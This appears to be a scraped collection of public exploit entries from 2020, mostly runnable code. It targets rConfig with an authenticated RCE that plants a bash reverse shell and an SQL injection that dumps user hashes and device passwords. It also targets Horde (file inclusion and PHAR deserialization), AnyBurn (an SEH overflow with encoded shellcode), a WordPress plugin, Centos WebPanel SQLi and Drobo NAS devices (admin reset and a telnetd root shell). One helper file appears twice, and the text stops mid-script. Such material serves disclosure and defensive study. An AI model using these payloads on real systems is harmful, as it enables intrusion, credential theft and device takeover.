# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution # Date: 2020-03-08 # Exploit Author: Engin Demirbilek # Vendor Homepage: https://www.rconfig.com/ # Version: rConfig <= 3.94 # Tested on: centOS # CVE: CVE-2020-10221 # Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce import requests import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) < 6: print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort" exit() url = sys.argv[1] user = sys.argv[2] password = sys.argv[3] payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5]) login = { 'user':user, 'pass':password, 'sublogin':'1' } req = requests.Session() print "Sendin login request ..." login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False) payload = { 'fileName':payload, } print "[+] Sendin exploit ..." exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={ 'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded'},verify=False) if exploit.status_code == 200: print "[+] Everything seems ok, check your listener." else: print "[-] Exploit failed, system is patched or credentials are wrong."

# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection # Exploit Author: vikingfr # Date: 2020-03-03 # CVE-2020-10220 # Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py # Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) # Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Version: tested v3.9.4 # Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 # # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # # $ python3 rconfig_sqli.py https://1.1.1.1 # rconfig 3.9 - SQL Injection PoC # [+] Triggering the payloads on https://1.1.1.1/commands.inc.php # [+] Extracting the current DB name : # rconfig2 # [+] Extracting 10 first users : # admin:1:63a9f0ea7bb98050796b649e85481845 # Maybe no more information ? # Maybe no more information ? # [snip] # [+] Extracting 10 first devices : # 127-0-0-1:127.0.0.1::ocdvulnpass: # deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret # Maybe no more information ? # Maybe no more information ? # [snip] # Done #!/usr/bin/python3 import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print ("rconfig 3.9 - SQL Injection PoC") if len(sys.argv) != 2: print ("[+] Usage : ./rconfig_exploit.py https://target") exit() vuln_page="/commands.inc.php" vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command" given_target = sys.argv[1] target = given_target target += vuln_page target += vuln_parameters request = requests.session() dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False) def extractDBinfos(myTarget=None,myPayload=None): """ Extract information from database Args: - target+payload (String) Returns: - payload result (String) """ result = "" encoded_request = myTarget+myPayload exploit_req = request.get(encoded_request) if '[PWN]' in str(exploit_req.content): result = str(exploit_req.content).split('[PWN]')[1] else: result="Maybe no more information ?" return result if dashboard_request.status_code != 404: print ("[+] Triggering the payloads on "+given_target+vuln_page) # get the db name print ("[+] Extracting the current DB name :") db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--" db_name = extractDBinfos(target,db_payload) print (db_name) # DB extract users print ("[+] Extracting 10 first users :") for i in range (0, 10): user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--" user_h = extractDBinfos(target,user1_payload) #print ("[+] Dump device "+str(i)) print (user_h) # DB extract devices information print ("[+] Extracting 10 first devices :") for i in range (0, 10): device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--" device_h = extractDBinfos(target,device_payload) #print ("[+] Dump device "+str(i)) print (device_h) print ("Done") else: print ("[-] Please verify the URI") exit()

## exploit-inc-inclusion.py #!/usr/bin/env python3 from horde import Horde import subprocess import sys TEMP_DIR = '/tmp' if len(sys.argv) < 5: print('Usage: <base_url> <username> <password> <filename> <php_code>') sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] filename = sys.argv[4] php_code = sys.argv[5] # log into the web application horde = Horde(base_url, username, password) # upload (delete manually) and evaluate the .inc file horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code)) horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename)) ## exploit-inc-inclusion.py EOF ## horde.py import re import requests class Horde(): def __init__(self, base_url, username, password): self.base_url = base_url self.username = username self.password = password self.session = requests.session() self.token = None self._login() def _login(self): url = '{}/login.php'.format(self.base_url) data = { 'login_post': 1, 'horde_user': self.username, 'horde_pass': self.password } response = self.session.post(url, data=data) token_match = re.search(r'"TOKEN":"([^"]+)"', response.text) assert ( len(response.history) == 1 and response.history[0].status_code == 302 and response.history[0].headers['location'] == '/services/portal/' and token_match ), 'Cannot log in' self.token = token_match.group(1) def upload_to_tmp(self, filename, data): url = '{}/turba/add.php'.format(self.base_url) files = { 'object[photo][img][file]': (None, filename), 'object[photo][new]': ('x', data) } response = self.session.post(url, files=files) assert response.status_code == 200, 'Cannot upload the file to tmp' def include_remote_inc_file(self, path): # vulnerable block (alternatively 'trean:trean_Block_Mostclicked') app = 'trean:trean_Block_Bookmarks' # add one dummy bookmark (to be sure) url = '{}/trean/add.php'.format(self.base_url) data = { 'actionID': 'add_bookmark', 'url': 'x' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark' # add bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark block' # edit bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[template]': '../../../../../../../../../../../' + path } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the bookmark block' # evaluate the remote file url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) print(response.text) # remove the bookmark block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the bookmark block' def trigger_phar(self, path): # vulnerable block (alternatively the same can be obtained by creating a # bookmark with the PHAR path and clocking on it) app = 'horde:horde_Block_Feed' # add syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the syndicated feed block' # edit syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[uri]': 'phar://{}'.format(path) } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the syndicated feed block' # load the PHAR archive url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) # remove the syndicated feed block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the syndicated feed block' ## horde.py EOF

## exploit-phar-loading.py #!/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMP_DIR = '/tmp' WWW_ROOT = '/var/www/html' if len(sys.argv) < 5: print('Usage: <base_url> <username> <password> <filename> <php_code>') sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] filename = sys.argv[4] php_code = sys.argv[5] source = '{}/{}.phar'.format(TEMP_DIR, filename) destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually) temp = 'temp.phar' url = '{}/static/{}.php'.format(base_url, filename) # log into the web application horde = Horde(base_url, username, password) # create a PHAR that performs a rename when loaded and runs the payload when executed subprocess.run([ 'php', 'create-renaming-phar.php', temp, source, destination, php_code ], stderr=subprocess.DEVNULL) # upload the PHAR with open(temp, 'rb') as fs: phar_data = fs.read() horde.upload_to_tmp('{}.phar'.format(filename), phar_data) # load the phar thus triggering the rename horde.trigger_phar(source) # issue a request to trigger the payload response = requests.get(url) print(response.text) ## exploit-phar-loading.py EOF ## create-renaming-phar.php #!/usr/bin/env php <?php // the __destruct method of Horde_Auth_Passwd eventually calls // rename($this->_lockfile, $this->_params['filename']) if $this->_locked class Horde_Auth_Passwd { // visibility must match since protected members are prefixed by "\x00*\x00" protected $_locked; protected $_params; function __construct($source, $destination) { $this->_params = array('filename' => $destination); $this->_locked = true; $this->_lockfile = $source; } }; function createPhar($path, $source, $destination, $stub) { // create the object and specify source and destination files $object = new Horde_Auth_Passwd($source, $destination); // create the PHAR $phar = new Phar($path); $phar->startBuffering(); $phar->addFromString('x', ''); $phar->setStub("<?php $stub __HALT_COMPILER();"); $phar->setMetadata($object); $phar->stopBuffering(); } function main() { global $argc, $argv; // check arguments if ($argc != 5) { fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n"); exit(1); } // create a fresh new phar $path = $argv[1]; $source = $argv[2]; $destination = $argv[3]; $stub = $argv[4]; @unlink($path); createPhar($path, $source, $destination, $stub); } main(); ## create-renaming-phar.php EOF ## horde.py import re import requests class Horde(): def __init__(self, base_url, username, password): self.base_url = base_url self.username = username self.password = password self.session = requests.session() self.token = None self._login() def _login(self): url = '{}/login.php'.format(self.base_url) data = { 'login_post': 1, 'horde_user': self.username, 'horde_pass': self.password } response = self.session.post(url, data=data) token_match = re.search(r'"TOKEN":"([^"]+)"', response.text) assert ( len(response.history) == 1 and response.history[0].status_code == 302 and response.history[0].headers['location'] == '/services/portal/' and token_match ), 'Cannot log in' self.token = token_match.group(1) def upload_to_tmp(self, filename, data): url = '{}/turba/add.php'.format(self.base_url) files = { 'object[photo][img][file]': (None, filename), 'object[photo][new]': ('x', data) } response = self.session.post(url, files=files) assert response.status_code == 200, 'Cannot upload the file to tmp' def include_remote_inc_file(self, path): # vulnerable block (alternatively 'trean:trean_Block_Mostclicked') app = 'trean:trean_Block_Bookmarks' # add one dummy bookmark (to be sure) url = '{}/trean/add.php'.format(self.base_url) data = { 'actionID': 'add_bookmark', 'url': 'x' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark' # add bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the bookmark block' # edit bookmark block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[template]': '../../../../../../../../../../../' + path } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the bookmark block' # evaluate the remote file url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) print(response.text) # remove the bookmark block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the bookmark block' def trigger_phar(self, path): # vulnerable block (alternatively the same can be obtained by creating a # bookmark with the PHAR path and clocking on it) app = 'horde:horde_Block_Feed' # add syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save-resume', 'app': app, } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot add the syndicated feed block' # edit syndicated feed block url = '{}/services/portal/edit.php'.format(self.base_url) data = { 'token': self.token, 'row': 0, 'col': 0, 'action': 'save', 'app': app, 'params[uri]': 'phar://{}'.format(path) } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot edit the syndicated feed block' # load the PHAR archive url = '{}/services/portal/'.format(self.base_url) response = self.session.get(url) # remove the syndicated feed block so to not break the page url = '{}/services/portal/edit.php'.format(self.base_url) data = { # XXX token not needed here 'row': 0, 'col': 0, 'action': 'removeBlock' } response = self.session.post(url, data=data) assert response.status_code == 200, 'Cannot reset the syndicated feed block' ## horde.py EOF

# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH) # Date: 2020-03-09 # Vendor Homepage: http://www.anyburn.com/ # Software Link : http://www.anyburn.com/anyburn_setup.exe # Exploit Authors: "Richard Davy/Gary Nield" # Tested Version: 4.8 (32-bit) # Tested on: Windows 10 Enterprise x64 # Vulnerability Type: Buffer Overflow/SEH/Unicode # Steps to Produce the Exploit: # 1.- Run python code # 2.- Open payload.txt and copy content to clipboard # 3.- Open AnyBurn choose 'Copy disk to image file' # 4.- Paste the content of payload.txt into the field: 'Select image file name' # 5.- Click 'Create Now' and you will see a crash and the payload launch. #!/usr/bin/env python #Set overall payload size crash_buffer_size = 10000 #nseh offset for SEH overwrite nseh_offset = 9197 #location in payload where stack alignment returns to for payload payloadret = 4459 #payload filler junk = "\x71" * payloadret #Payload generated via msfvenom, easily changeable as padding is auto calculated #msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51" buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44" buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41" buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50" buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31" buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50" buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49" buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51" buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42" buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b" buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30" buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50" buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32" buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f" buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31" buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c" buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57" buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54" buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51" buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59" buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59" buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b" buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37" buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b" buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38" buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54" buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31" buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53" buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31" buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51" buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d" buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d" buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f" buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36" buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d" buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35" buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57" buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b" buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e" buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41" #Filler padding after payload code to bring us to nseh offset #auto calculated in case payload size changes junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf))) #SEH Overwrite nSeh = "\x61\x70" #Unicode safe SEH return seh = "\x09\x48" #Stack realignment which takes us directly back into shellcode eax_align = "\x70\x71\x71\x71" eax_align += "\x54" eax_align += "\x47" eax_align += "\x58" eax_align += "\x47" eax_align += "\x05\x2F\x11" eax_align += "\x47" eax_align += "\x2d\x01\x11" eax_align += "\x47" eax_align += "\x50" eax_align += "\x47" eax_align += "\xc3" #Padding to take us to 10,000 padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align))) #Assembly of parts buffer=junk+buf+junk1+nSeh+seh+eax_align+padding try: f=open("payload.txt","w") print "\nAnyBurn Version 4.8 (32-bit) Exploit\n" print "Software Link : http://www.anyburn.com/anyburn_setup.exe" print "Exploit Authors: Richard Davy/Gary Nield" print "Tested on: Windows 10 Enterprise x64" print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n" print "Steps to Produce the Exploit:" print "1.- Run python code" print "2.- Open payload.txt and copy content to clipboard" print "3.- Open AnyBurn choose 'Copy disk to image file'" print "4.- Paste the content of payload.txt into the field: 'Select image file name'" print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n" print "[+] Creating %s bytes evil payload " %len(buffer) f.write(buffer) f.close() print "[+] File payload.txt created..." except: print "[!] File cannot be created..."

# Exploit Title: Wordpress Plugin Custom Searchable Data System - Unauthenticated Data modification # Date: 13 March 2020 # Exploit Author: Nawaf Alkeraithe # Vendor Homepage: https://wordpress.org/plugins/custom-searchable-data-entry-system/ # Software Link: https://wordpress.org/plugins/custom-searchable-data-entry-system/ # Version: 1.7.1 Plugin fails to perform authorization check to delete/add/edit data entries. PoC (delete entry): GET /wordpress/wp-admin/admin.php?page=sds-form-entries&sds-del-entry-first-entry-id=[ENTRY ID1]&sds-del-entry-last-entry-id=[ENTRY ID2]&sds-del-entry-table-row=wp_ghazale_sds_newtest_inputs Note: plugin is not maintained now, either remove it, or apply the authorization check to all actions. Special thanks to *Wordfence and Sean Murphy! (https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/ <https://www.wordfence.com/blog/2020/03/active-attack-on-zero-day-in-custom-searchable-data-entry-system-plugin/>)*

# Exploit Title: Centos WebPanel 7 - 'term' SQL Injection # Google Dork: N/A # Date: 2020-03-03 # Exploit Author: Berke YILMAZ # Vendor Homepage: http://centos-webpanel.com/ # Software Link: http://centos-webpanel.com/ # Version: v6 - v7 # Tested on: Kali Linux - Windows 10 # CVE : CVE-2020-10230 # Type: Error Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(1197=1197,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aRuO # Type: Time Based SQL Injection # Payload: https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a' OR SLEEP(5)-- JCpP Centos-Webpanel (http://centos-webpanel.com/) CentOS Web Panel | Free Linux Web Hosting Control Panel Free CentOS Linux Web Hosting control panel designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing

# Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection # Date: 2020-03-12 # Exploit Author: Rick Ramgattie, Ian Sindermann # Vendor Homepage: https://www.drobo.com/ # Version: 4.1.1 and lower. # CVE: CVE-2018-14709, CVE-2018-14701 ### #!/usr/bin/env python3 # nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service. # This utility leverages the lack of any real authentication mechanism to perform arbitrary actions. # These actions include: # - Getting device status. # - Installing applications. # - Resetting admin credentials. # - Popping root shells. # - Turning on party mode. # This set of exploits is known to affect the Drobo 5N2, firmware version 4.1.1 and lower. # As of 2020-03-12, newer firmware versions appear to be vulnerable as well, but this has not been verified. # Most of the Drobo product line also appears to be vulnerable. Again, this has not been verified. # These vulnerabilities were disclosed to the manufacturer on 2018-07-10. # More vulnerabilities for this device may be found here: https://blog.securityevaluators.com/4f1d885df7fc ### # Product of ISE Labs. # - http://www.securityevaluators.com/ # - @ISESecurity ### # RE Notes: # ,-- Encryption bool? # Handshake Preamble: * /\ # 44 52 49 4e 45 54 54 4d 07 01 00 00 00 00 00 88 # \_____________________/ \_________/ \_________/ # Static string. To/from Size of # "DIRNETTM" server? next message # # Handshake # 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 64 72 61 31 37 33 32 30 32 33 30 30 30 31 30 00 00 00 00 00 00 00... # \______________________________________________/ \_________/ \_______________________________________________/ \_________________--> # Device serial number with NULL padding. NULL Device serial number with NULL padding. ESAID? 88 bytes of NULL # "dra173202300010" "dra173202300010" # # The stat port returns an "ESAID" value that is identical to the serial number on this device (5N2). # One of the serial numbers in this packet may actually be the ESAID. # # Preamble: * # 44 52 49 4e 45 54 54 4d 0a 01 00 00 00 00 00 88 # \_____________________/ \_________/ \_________/ # Static string. To/from Size of # "DIRNETTM" server? next message # # Message: # XX XX XX XX XX XX XX XX 00 # \_____________________/ \/ # Arbitrary length string NULL terminator # # # Protocol flow: # Initial handshake: ,----- 2nd nibble in 3rd section is different. "07 01 00 00" instead of "0a 01 00 00" #TODO: why? # | c -> s: Preamble. <-' \_ # | c -> s: Message: Handshake / `- These two are normally sent as one packet. # v c <- s: Preamble. <-------- 2nd nibble in 3rd section is different. "87 01 00 00" instead of "8a 01 00 00" #TODO: why? # Loop: # +> c -> s: Preamble. # | c -> s: Message: Command. # | c <- s: Preamble. # +- c <- s: Message: Results. > Large responses are split into chunks. Must use size from preamble. import argparse import logging import re import socket import struct import sys LOG_FORMAT = '[%(levelname)s]: %(message)s' BUFFER_SIZE = 1024 HANDSHAKE_PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x07\x01\x00\x00' PREAMBLE = b'\x44\x52\x49\x4e\x45\x54\x54\x4d\x0a\x01\x00\x00' PREAMBLE_LEN = 16 # Note: Payloads usually contain the device's serial number. Replace this with # '{serial}' so `send_msg` can insert the target's serial. PAYLOADS = { "daccess" :'<TMCmd><CmdID>78</CmdID><Params><Name>DroboAccess</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/DroboAccess.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "dropbear":'<TMCmd><CmdID>78</CmdID><Params><Name>dropbear</Name><Action>Install</Action><Data>ftp://updates.drobo.com/droboapps/2.1/downloads/dropbear.tgz</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "getadmin":'<TMCmd><CmdID>30</CmdID><Params><DRINasAdminConfig>DRINasAdminConfig</DRINasAdminConfig><DRINasDroboAppsConfig>DRINasDroboAppsConfig</DRINasDroboAppsConfig></Params><ESAID>{serial}</ESAID></TMCmd>', "getnet" :'<TMCmd><CmdID>30</CmdID><ESAID>{serial}</ESAID><Params><Network>Network</Network></Params></TMCmd>', "gettemp" :'<TMCmd><CmdID>61</CmdID><ESAID>{serial}</ESAID></TMCmd>', "partyon" :'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>900</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>', "partyoff":'<TMCmd><CmdID>26</CmdID><Params><IdentifyInterval>0</IdentifyInterval></Params><ESAID>{serial}</ESAID></TMCmd>', "popit" :'<TMCmd><CmdID>78</CmdID><Params><Name>Drobo`telnetd -l $SHELL -p 8383`Access</Name><Action>Install</Action><Data>bork</Data></Params><ESAID>{serial}</ESAID></TMCmd>', "restart" :'<TMCmd><CmdID>21</CmdID><ESAID>{serial}</ESAID></TMCmd>', "setadmin":'<TMCmd><CmdID>31</CmdID><Params><DRINASConfig><DRINasAdminConfig><UserName>admin</UserName><Password>ono</Password><ValidPassword>1</ValidPassword><EncryptedPassword>0</EncryptedPassword></DRINasAdminConfig><DRINasDroboAppsConfig><Version>11</Version><Enabled>1</Enabled></DRINasDroboAppsConfig></DRINASConfig></Params><ESAID>{serial}</ESAID></TMCmd>', "test" :'<TMCmd><CmdID>82</CmdID><Params><Time>1521161215</Time><GMTOffset>4294966876</GMTOffset></Params><ESAID>{serial}</ESAID></TMCmd>', "stdin" :'Handled elsewhere.'} DEFAULT_PORT_STAT = 5000 DEFAULT_PORT_CMD = 5001 DEFAULT_TIMEOUT = None HELP_EPILOG=''' PAYLOADS daccess - Installs DroboAccess on the target device. At the time of writing, DroboAccess has numerous unauthenticated command injection vulnerabilities. Try the following: GET /DroboAccess/delete_user?username=test';/usr/sbin/telnetd -l /bin/sh -p 8383 - A long delay and response of "<Error>0</Error>" is expected. dropbear - Installs dropbear on the target device. - A response of "<Error>0</Error>" is expected. getadmin - Returns the target's current (redacted) admin configuration. gettemp - Returns the target's system info (temperature and uptime). getnet - Returns the target's network info. partyon - Enables "party mode" on the target. This will cause the target device's lights to blink for 15 minutes. partyoff - Prematurely disables "party mode". popit - Exploits CVE-2019-6801 to spawn a root bind shell on port 8383. - A response of "<Error>1</Error>" is expected. restart - Restarts the target device. setadmin - Sets administrative options on the target. - Username: admin - Password: ono - Apps enabled: yes stdin - Reads data from STDIN and sends it as a command. ''' def recv_message(s): preamble = s.recv(PREAMBLE_LEN) msg_len = struct.unpack(">I", preamble[-4:])[0] # Parse expected message length from preamble. message = '' if msg_len <= 0: return(message) while True: message += s.recv(BUFFER_SIZE).decode('utf-8') if len(message) >= msg_len: return(message) # There will be a null at the end. It should be fine. def send_handshake(s, serial): serial_bytes = serial.encode('utf-8') hs_body = struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. hs_body += struct.pack(">I", 0) # 4 byte field, presumably uint, only seen as zero. hs_body += struct.pack("16s", serial_bytes) # 16 byte padded string containing device serial number. again... hs_body += struct.pack("184x") # 184 bytes of NULL padding. size_bytes = struct.pack(">I", len(hs_body)) # Size of message body. Send with preamble. hs_data = HANDSHAKE_PREAMBLE + size_bytes + hs_body logging.debug(repr(hs_data)) s.send(hs_data) def send_message(s, serial, message): msg_body = message.format(serial=serial) # Add target device's serial number. msg_body_bytes = msg_body.encode('utf-8') msg_body_bytes += struct.pack("x") # NULL terminator. size_bytes = struct.pack(">I", len(msg_body_bytes)) # Size of XML body. Send with preamble. msg_data = PREAMBLE + size_bytes + msg_body_bytes logging.debug(repr(msg_data)) s.send(msg_data) aparser = argparse.ArgumentParser( description='nasty.py - A proof-of-concept utility for (maliciously) interacting with the Drobo NASd service.', epilog=HELP_EPILOG, formatter_class=argparse.RawDescriptionHelpFormatter) aparser.add_argument("host", help='Host or IP address of the target Drobo.') aparser.add_argument("payload", help='Payload to use. See PAYLOADS.') aparser.add_argument("-p", "--portstat", help='Specify a non-default stat port on the Drobo.', default=DEFAULT_PORT_STAT, type=int) aparser.add_argument("-P", "--portcmd", help='Specify a non-default command port on the Drobo.', default=DEFAULT_PORT_CMD, type=int) aparser.add_argument("-s", "--serial", help='Manually set the target serial number. Skips serial number detection.') aparser.add_argument("-t", "--timeout", help='Set a timeout in seconds for socket operations.', default=DEFAULT_TIMEOUT, type=float) aparser.add_argument("-v", "--verbose", help='Increase verbosity.', action='store_true') args = aparser.parse_args() # Basic check for color support. if sys.stdout.isatty() and sys.platform in ["linux","linux2","darwin"]: logging.addLevelName(logging.NOTSET, "\033[39m????\033[0m") logging.addLevelName(logging.DEBUG, "\033[37mDBUG\033[0m") 